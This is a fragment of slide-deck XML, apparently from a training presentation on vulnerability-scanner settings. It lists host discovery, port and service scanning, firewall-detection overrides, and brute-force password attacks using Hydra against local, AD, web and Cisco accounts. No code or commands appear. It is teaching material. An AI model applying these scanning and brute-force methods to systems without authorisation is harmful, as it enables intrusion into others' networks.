                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to every remote port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Successful == port reachable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Downside: obvious</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sp>
        <p:nvSpPr>
          <p:cNvPr id="289" name="Shape 28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More Host Discovery Options</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290" name="Shape 290"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1063375"/>
            <a:ext cx="8229600" cy="3725699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="2400"/>
              <a:t>Wake-on-LAN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>(allows a “magic packet” sent from the network to wake the machine)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Newer Intel, Broadcom NICs only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Specify list of MAC addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Wait a timeout period for boot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="2400"/>
              <a:t>Network Type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>RFC 1918 Mixed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>LAN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>WAN</a:t>
            </a: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4" name="Shape 294"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="295" name="Shape 295"/>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Port Scanning Options</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="Shape 296"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1063375"/>
            <a:ext cx="8229600" cy="3725699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Specify SSH, WMI, SNMP for enumeration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Multiple protocols </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>TCP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>SYN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>UDP (unreliable, lengthy; can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>’t differentiate between open + filtered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Override firewall detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Soft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Aggressive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Off</a:t>
            </a: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0" name="Shape 300"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301" name="Shape 301"/>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Service Discovery Options</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302" name="Shape 302"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1063375"/>
            <a:ext cx="8229600" cy="3725699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Probe all ports + their associated services (might disrupt certain services)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Search for SSL-based services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Known ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>All ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Identify certificates pending expiry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Utilize all SSL ciphers, not just advertised ones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Use certificate revocation lists from Internet</a:t>
            </a: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 name="Shape 306"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="307" name="Shape 30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Brute-Force Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="308" name="Shape 308"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1063375"/>
            <a:ext cx="8229600" cy="3725699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use user-provided credentials, login, password files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hail Hydra (attacks HTTPS, SSL, TLS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Parallelize</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Empty passwords, password as username…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Test local and AD domain accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Enumerate all domain users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Attack Web-based and Cisco systems</a:t>
            </a:r>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x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="313" name="Shape 313"/>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Advanced Options</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="314" name="Shape 314"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1063375"/>
            <a:ext cx="8229600" cy="3725699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Scan randomly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Don’t scan unresponsive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Slow for, detect network congestion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>How many concurrent TCP sessions?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Debug plugins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Keep logs on server</a:t>
            </a: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8" name="Shape 318"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="319" name="Shape 31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More Credential-Based Options</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="320" name="Shape 320"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="28681" l="0" r="0" t="19731"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="565300" y="1063375"/>
            <a:ext cx="8229600" cy="3976107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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4" name="Shape 324"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325" name="Shape 325"/>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Discovery Scanning to Find Ports</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326" name="Shape 326"/>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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="327" name="Shape 327"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="35421" l="0" r="47723" t="16233"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="524325" y="1200150"/>
            <a:ext cx="2870823" cy="2486601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="328" name="Shape 328"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
